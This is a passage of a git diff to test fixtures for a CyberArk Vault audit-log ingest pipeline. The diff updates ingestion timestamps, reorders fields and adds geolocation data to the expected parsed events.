Name=\\\"Address\\\" 
Value=\\\"components\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"25\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"GroupName\\\" Value=\\\"WindowsGroup\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1615419568\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Index\\\" Value=\\\"2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DualAccountStatus\\\" Value=\\\"Active\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"VirtualUsername\\\" Value=\\\"virtual\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 04:48:26\",\"IsoTimestamp\":\"2021-03-14T11:48:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"459\",\"Desc\":\"General Audit\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"General Audit\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Dual account rotation\",\"ExtraDetails\":\"DualAccountStatus=Active;Index=2;\",\"Message\":\"General 
Audit\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountB\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"25\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615419568\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"2\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Active\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "459", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-467-the-component-public-key-for-jwt-authentication-was-updated.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-467-the-component-public-key-for-jwt-authentication-was-updated.log-expected.json index 3f96e28a992..8d6459ea8d4 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-467-the-component-public-key-for-jwt-authentication-was-updated.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-467-the-component-public-key-for-jwt-authentication-was-updated.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "10.0.1.20", - "ip": "10.0.1.20" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "10.0.1.20" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "10.0.1.20", + "ip": "10.0.1.20" + }, "event": { "severity": 2, "action": "the component public key for jwt authentication was updated", - "ingested": "2021-12-09T13:37:05.706900Z", + "ingested": "2021-12-14T14:42:34.345353818Z", "original": "\u003c5\u003e1 2021-03-10T18:14:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:14:35\",\"IsoTimestamp\":\"2021-03-10T18:14:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"467\",\"Desc\":\"The component public key for JWT authentication was updated\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"The component public key for JWT authentication was updated\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"The component public key for JWT authentication was updated\",\"GatewayStation\":\"\"}}}", "code": "467", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-479-security-warning-the-signature-hash-algorithm-of-the-vault-certificate-is-sha1.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-479-security-warning-the-signature-hash-algorithm-of-the-vault-certificate-is-sha1.log-expected.json index f86608120b8..c36b188ae81 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-479-security-warning-the-signature-hash-algorithm-of-the-vault-certificate-is-sha1.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-479-security-warning-the-signature-hash-algorithm-of-the-vault-certificate-is-sha1.log-expected.json 
@@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 7 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 7 + } + }, "cyberarkpas": { "audit": { "severity": "Error", @@ -44,15 +37,22 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:37:05.810861Z", + "ingested": "2021-12-14T14:42:34.464989468Z", "original": "\u003c7\u003e1 2021-03-04T19:10:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:01\",\"IsoTimestamp\":\"2021-03-04T19:10:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"479\",\"Desc\":\"Security warning - The Signature Hash Algorithm of the Vault certificate is SHA1.\",\"Severity\":\"Error\",\"Issuer\":\"Builtin\",\"Action\":\"Security warning - The Signature Hash Algorithm of the Vault certificate is SHA1.\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Security warning - The Signature Hash Algorithm of the Vault certificate is SHA1.\",\"GatewayStation\":\"\"}}}", "code": "479", "kind": "event", "action": "security warning - the signature hash algorithm of the vault certificate is sha1.", "type": "error" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { 
@@ -90,7 +90,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:37:05.810869800Z", + "ingested": "2021-12-14T14:42:34.464992773Z", "original": "Mar 08 07:46:54 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"479\",\"Desc\":\"Security warning - The Signature Hash Algorithm of the Vault certificate is SHA1.\",\"Severity\":\"Error\",\"Issuer\":\"Builtin\",\"Action\":\"Security warning - The Signature Hash Algorithm of the Vault certificate is SHA1.\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Security warning - The Signature Hash Algorithm of the Vault certificate is SHA1.\",\"GatewayStation\":\"\"}}}", "code": "479", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-482-update-existing-add-account-bulk-operation-succeeded.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-482-update-existing-add-account-bulk-operation-succeeded.log-expected.json index 53c760d0864..2b30b915b38 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-482-update-existing-add-account-bulk-operation-succeeded.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-482-update-existing-add-account-bulk-operation-succeeded.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "10.0.1.20", - "ip": "10.0.1.20" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "10.0.1.20" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "10.0.1.20", + "ip": "10.0.1.20" + }, "event": { "severity": 2, "action": "update existing add account bulk operation succeeded", - "ingested": "2021-12-09T13:37:05.981143100Z", + "ingested": "2021-12-14T14:42:34.658542393Z", "original": "\u003c5\u003e1 2021-03-10T08:31:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:31:49\",\"IsoTimestamp\":\"2021-03-10T08:31:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"482\",\"Desc\":\"Update existing Add Account Bulk Operation succeeded\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Update existing Add Account Bulk Operation succeeded\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update existing Add Account Bulk Operation succeeded\",\"GatewayStation\":\"\"}}}", "code": "482", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-50-store-file.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-50-store-file.log-expected.json index 3b417a619cf..d3406f2e309 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-50-store-file.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-50-store-file.log-expected.json 
@@ -52,7 +52,7 @@ "event": { "severity": 2, "action": "store file", - "ingested": "2021-12-09T13:37:06.052356900Z", + "ingested": "2021-12-14T14:42:34.777873875Z", "original": "\u003c5\u003e1 2021-03-08T18:24:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:24:50\",\"IsoTimestamp\":\"2021-03-08T18:24:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Store File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAPrivateUserPrefs\",\"File\":\"Root\\\\YWRtaW5pc3RyYXRvcg==\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"\"}}}", "code": "50", "kind": "event" @@ -65,6 +65,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -110,7 +119,7 @@ "event": { "severity": 2, "action": "store file", - "ingested": "2021-12-09T13:37:06.052364800Z", + "ingested": "2021-12-14T14:42:34.777876388Z", "original": "\u003c5\u003e1 2021-03-10T09:11:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:21\",\"IsoTimestamp\":\"2021-03-10T09:11:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"Root\\\\syntaxparser-conf.json.1.1\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"\"}}}", "code": "50", "kind": "event" @@ -168,7 +177,7 @@ "event": { "severity": 2, "action": "store file", - "ingested": "2021-12-09T13:37:06.052371300Z", + "ingested": "2021-12-14T14:42:34.777876823Z", "original": "\u003c5\u003e1 2021-03-10T18:36:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:36:22\",\"IsoTimestamp\":\"2021-03-10T18:36:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"Root\\\\PVConfiguration.xml\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"\"}}}", "code": "50", "kind": "event" 
@@ -181,6 +190,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, @@ -226,7 +244,7 @@ "event": { "severity": 2, "action": "store file", - "ingested": "2021-12-09T13:37:06.052377200Z", + "ingested": "2021-12-14T14:42:34.777877218Z", "original": "\u003c5\u003e1 2021-03-10T22:17:56Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:56\",\"IsoTimestamp\":\"2021-03-10T22:17:56Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"ROOT\\\\PVConfiguration.xml\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"\"}}}", "code": "50", "kind": "event" @@ -239,6 +257,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -285,7 +312,7 @@ "event": { "severity": 2, "action": "store file", - "ingested": "2021-12-09T13:37:06.052383700Z", + "ingested": "2021-12-14T14:42:34.777877610Z", "original": "\u003c5\u003e1 2021-03-11T17:38:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e50\u003c/MessageID\u003e\\n \u003cDesc\u003eStore File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eStore File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n \u003cFile\u003eroot\\\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore File\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:27\",\"IsoTimestamp\":\"2021-03-11T17:38:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Store 
File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"root\\\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"\"}}}", "code": "50", "kind": "event" 
@@ -353,7 +380,7 @@ "event": { "severity": 2, "action": "store file", - "ingested": "2021-12-09T13:37:06.052388Z", + "ingested": "2021-12-14T14:42:34.777877998Z", "original": "\u003c5\u003e1 2021-03-11T19:45:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 11:45:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T19:45:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e50\u003c/MessageID\u003e\\n \u003cDesc\u003eStore File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eStore File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePVWAConfig\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PVConfiguration.xml\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 11:45:26\",\"IsoTimestamp\":\"2021-03-11T19:45:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store 
File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"Root\\\\PVConfiguration.xml\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "50", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-51-retrieve-file.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-51-retrieve-file.log-expected.json index 14ef75b4cb3..cc9107bce92 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-51-retrieve-file.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-51-retrieve-file.log-expected.json @@ -52,7 +52,7 @@ "event": { "severity": 2, "action": "retrieve file", - "ingested": "2021-12-09T13:37:06.666779900Z", + "ingested": "2021-12-14T14:42:35.435739231Z", "original": "\u003c5\u003e1 2021-03-04T19:10:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:05\",\"IsoTimestamp\":\"2021-03-04T19:10:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"51\",\"Desc\":\"Retrieve File\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManagerShared\",\"File\":\"Root\\\\Policies\\\\Policy-GenericWebApp.ini\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve File\",\"GatewayStation\":\"\"}}}", "code": "51", "kind": "event" 
@@ -110,7 +110,7 @@ "event": { "severity": 2, "action": "retrieve file", - "ingested": "2021-12-09T13:37:06.666790300Z", + "ingested": "2021-12-14T14:42:35.435741510Z", "original": "\u003c5\u003e1 2021-03-04T19:11:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:11:23\",\"IsoTimestamp\":\"2021-03-04T19:11:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"51\",\"Desc\":\"Retrieve File\",\"Severity\":\"Info\",\"Issuer\":\"Prov_COMPONENTS\",\"Action\":\"Retrieve File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"AppProviderConf\",\"File\":\"Root\\\\main_appprovider.conf.Win64.11.04\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve File\",\"GatewayStation\":\"\"}}}", "code": "51", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-52-delete-file.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-52-delete-file.log-expected.json index 7fc36b20c4b..6a20e77a944 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-52-delete-file.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-52-delete-file.log-expected.json 
@@ -69,7 +69,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-12-09T13:37:06.873530700Z", + "ingested": "2021-12-14T14:42:35.693137601Z", "original": "\u003c5\u003e1 2021-03-08T18:32:43Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:32:43\",\"IsoTimestamp\":\"2021-03-08T18:32:43Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WinDesktopLocal-Address-adriansr\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"adriansr\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "52", "kind": "event" 
@@ -145,7 +145,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-12-09T13:37:06.873540300Z", + "ingested": "2021-12-14T14:42:35.693140046Z", "original": "\u003c5\u003e1 2021-03-08T18:38:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:38:21\",\"IsoTimestamp\":\"2021-03-08T18:38:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"VaultInternal\",\"File\":\"Root\\\\Operating System-WinServerLocal-components-adriansr\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinServerLocal\"},{\"Name\":\"UserName\",\"Value\":\"adriansr\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"LogonDomain\",\"Value\":\"COMPONENTS\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "52", "kind": "event" 
